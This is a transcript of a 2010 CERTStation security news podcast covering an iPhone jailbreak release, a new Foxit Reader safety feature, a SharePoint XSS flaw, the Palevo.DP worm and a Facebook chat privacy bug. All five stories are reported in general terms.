18th week of Security Podcast for CERTSTATION

Hello and welcome to the CERTStation Podcast for the 18th week of 2010. I am Jay Johnson and these are the headlines:

Jailbreak for the latest iPhone, iPad, and iPod Touch firmware has been released (pause)
Foxit Reader adds new security features to compete against Adobe's Acrobat Reader while
Microsoft's SharePoint bug exposes credentials and sensitive data (pause)
New P2P worm targets USB drives and young audience and Finally
A security loophole in Facebook exposes private chats

And now for this week's newswire details
Hackers have once again wrested a measure of control from Apple's iron-fisted grasp of iPads and newer iPhones with the release of jailbreaking software that allows hundreds of unapproved apps to be installed on the devices. The package, called Spirit, was released over the weekend for devices running firmware versions 3.1.2, 3.1.3, and 3.2, which until now weren't easily freed from Steve Jobs' Howard-Hughesian control. The software allows users to customize homescreen images, tether the devices to a PC so they can be used as a modem and do other things that Apple considers verboten. It also allows users to install third-party apps from unapproved repositories such as Cydia and RockYourPhone. Spirit works only on iPhones that have been activated and are already running an unmodified version of recent firmware. Devices that have been jailbroken by another program should be restored to 3.1.2, but users should ensure SHSH blobs have been backed up, the authors stress. It provides no support for unlocking carriers, so users will still be stuck with current mobile provider after running the software.

(pause)
Version 3.3 of Foxit Reader contains a feature called Trust Manager which allows configuring the Reader so that it no longer executes scripts and programs embedded in a PDF document. A similar feature has been available in Adobe Reader for some time. By incorporating this functionality, the Foxit developers have responded to the still smoldering problem with the PDF specification's /launch function. The "Launch Actions/Launch File" function allows scripts or EXE files embedded in PDFs to run. Although, since version 3.2.1.0401, Foxit has issued a dialogue message asking users to confirm the execution of such embedded code, this dialogue can be formed in such a way that users have no idea they may be allowing malware to infect their systems. If "Enable Safe Reading Mode" is activated, Foxit Reader won't even execute the code when a user disregards the alert and opens a script. The new option is activated by default during installation. Adobe Reader handles this feature the opposite way: Only disabling the "Allow opening non-PDF file attachments with external applications" feature, which is enabled by default, makes Adobe Reader immune. Only recently, anti-virus vendors reported that criminals have attempted to use PDF documents to infect Windows PCs with ZeuS bots and worms. Therefore, users are urgently advised to check the configuration of their PDF Reader.

(pause)
Microsoft says it's investigating a security flaw in older versions of its SharePoint Server product that an independent researcher says can easily expose sensitive data and user authentication credentials. The XSS, or cross-site scripting, vulnerability has been confirmed in SharePoint Server 2007 and is likely also present in earlier versions of the content management system software, an advisory from High-Tech Bridge warned. It allows adversaries to inject malicious JavaScript into the application by appending commands to the address of the targeted system. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. XSS bugs are by far the most common form of vulnerability plaguing the web. Web masters and software makers often downplay them as insignificant, because the severity of many of them is minimal. But as breaches like the one experienced by the heavily fortified Apache Foundation demonstrate, they have the potential to serve as the chink that compromises an otherwise secure defense.

(pause)
A crafty new P2P worm appears to be spreading quickly among users of a range of popular file-sharing programs. So far the countries affected by the worm variant BitDefender calls Palevo.DP - Romania, Mongolia or Indonesia - suggest that the worm is being driven by factors specific to those countries. However, the file-sharing and IM services affected, said to include LimeWire, Ares, BearShare, iMesh, Shareza, Kazaa, DC++, and eMule, are wirdely used around the world by a mainly young audience, so the warning for users outside these countries is clear. The worm lures victims using a link embedded in a spam IM message, which leads to what appears to be an image file but is actually the malicious payload. From that point on, the malware burrows into the host by installing a number of files that compromise the Windows XP firewall. Two elements make Palevo.DP interesting. First, it copies itself to network shares from the infected PC as well as USB sticks or other external drives. Any unprotected system with the Windows auto run feature turned on - basically almost every PC - will find itself infected as those drives are moved from PC to PC. The second feature is its targeting of P2P services by adding code to shared program files. The combination of removable media and P2P gives the worm a two-pronged attack-and-spread strategy which allows it to target home systems which are then used to launch attacks on better-defended business PCs from inside the network perimeter. This Palevo offensive is highly aggressive and during the very beginning of the outbreak we have witnessed rates of infection which easily exceeded 500 percent per hour says BitDefender senior researcher, Catalin Cosoi.

(pause)
Facebook engineers on Wednesday disabled the site's live chat function after people outside the company discovered a bug that allowed users to eavesdrop on their friends' conversations. The site - whose founder insists "people have really gotten comfortable sharing more information" with world+dog - also had to take emergency action to correct a separate hole that allowed users to see their friends' pending friend requests. Ironically, the gaffes were the result of a new preview my profile service Facebook added late last month in an effort to give users more control over their privacy settings. Facebook said they had persisted for a limited period of time, but wasn't any more specific. In a statement issued a few hours after the bug was reported by TechCrunch, Facebook said it temporarily suspended the chat function while it patched the information leak. With that work completed, it said it expected to turn chat back on "shortly."

If you enjoyed this podcast why not visit CERTStation.com and check out our free Internet Security Dashboard. In the meantime this is your host Jay Johnson wishing you a safe and secure week.